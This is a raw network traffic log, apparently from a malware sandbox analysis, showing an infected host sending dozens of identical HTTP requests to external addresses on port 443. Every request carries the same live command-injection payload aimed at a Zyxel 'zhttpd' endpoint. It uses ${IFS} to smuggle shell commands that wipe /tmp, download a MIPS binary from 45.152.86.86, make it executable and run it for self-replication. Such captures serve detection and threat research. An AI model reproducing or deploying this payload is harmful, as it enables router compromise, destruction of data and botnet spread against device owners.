                                        Mar 31, 2024 09:20:53.541635990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2854192.168.2.2333138108.215.32.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541704893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2855192.168.2.2344936148.8.175.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541775942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2856192.168.2.2336978137.55.14.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541831970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2857192.168.2.2342214182.47.250.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541904926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2858192.168.2.2339394208.164.249.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541960955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2859192.168.2.233385093.228.163.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542033911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2860192.168.2.234949039.217.246.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542098999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2861192.168.2.2352298178.54.147.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542171955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2862192.168.2.235245642.116.174.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542239904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2863192.168.2.233960074.126.177.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542304993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2864192.168.2.233339634.228.241.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542395115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2865192.168.2.2353844207.129.3.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542465925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2866192.168.2.2343802220.149.4.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542551994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2867192.168.2.234807492.220.152.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542603970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2868192.168.2.234369639.150.145.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542665005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2869192.168.2.234975024.61.135.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542716026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2870192.168.2.234204039.163.248.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542798996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2871192.168.2.2358354124.29.40.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542853117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2872192.168.2.2344980134.91.78.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542923927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2873192.168.2.235950845.237.74.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.542994976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2874192.168.2.234270481.86.135.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.543078899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2875192.168.2.2356496180.56.235.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.543133020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2876192.168.2.234708839.147.162.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.543205976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2877192.168.2.2354180146.93.200.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.543282986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2878192.168.2.235531668.55.159.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.543335915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2879192.168.2.2337582169.118.70.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.543414116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2880192.168.2.2337908201.119.86.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.552620888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2881192.168.2.2358406120.123.237.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.553858042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2882192.168.2.236051635.69.234.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.553940058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2883192.168.2.233706048.38.41.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554003954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2884192.168.2.2359854213.144.232.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554064989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2885192.168.2.234071268.58.9.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554122925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2886192.168.2.2349460204.46.204.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554205894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2887192.168.2.2346492201.100.27.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554267883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2888192.168.2.2338692100.171.214.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554322004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2889192.168.2.2360410150.178.138.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554385900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2890192.168.2.235936223.16.159.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554490089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2891192.168.2.233477696.116.27.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554562092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2892192.168.2.235201090.13.173.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554630041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2893192.168.2.235136297.153.201.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554678917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2894192.168.2.2338914135.42.153.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554748058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2895192.168.2.235629095.26.38.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554805040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2896192.168.2.235623817.212.180.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554891109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2897192.168.2.233348017.59.194.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.554945946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2898192.168.2.2348138193.165.212.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.555023909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2899192.168.2.2337612111.185.86.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.555078030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2900192.168.2.235582838.152.218.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.555141926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2901192.168.2.235211699.83.58.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.551661968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2902192.168.2.233604248.168.5.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.551717997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2903192.168.2.2338290176.36.209.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.551758051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2904192.168.2.2340680185.94.192.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.551811934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2905192.168.2.2335704117.252.229.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.551863909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2906192.168.2.234025246.137.138.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.551897049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2907192.168.2.234128467.217.213.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.551928997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2908192.168.2.2344758192.255.122.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.551981926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2909192.168.2.2342194222.112.131.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.552022934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2910192.168.2.234509858.111.125.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.552072048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2911192.168.2.2336344153.107.98.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.552134037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2912192.168.2.233397027.192.248.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.552164078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2913192.168.2.235766219.157.127.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.552221060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2914192.168.2.2346794163.175.150.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.552272081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2915192.168.2.2339994146.26.50.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.552301884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2916192.168.2.234194635.147.176.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:54.552345037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2917192.168.2.235656496.189.78.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:55.555572987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2918192.168.2.2341600143.103.248.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:55.555619001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2919192.168.2.2346874104.44.111.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:55.555680990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2920192.168.2.2351824100.211.185.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:55.555710077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2921192.168.2.235334074.179.44.108443
                                        TimestampBytes transferredDirectionData
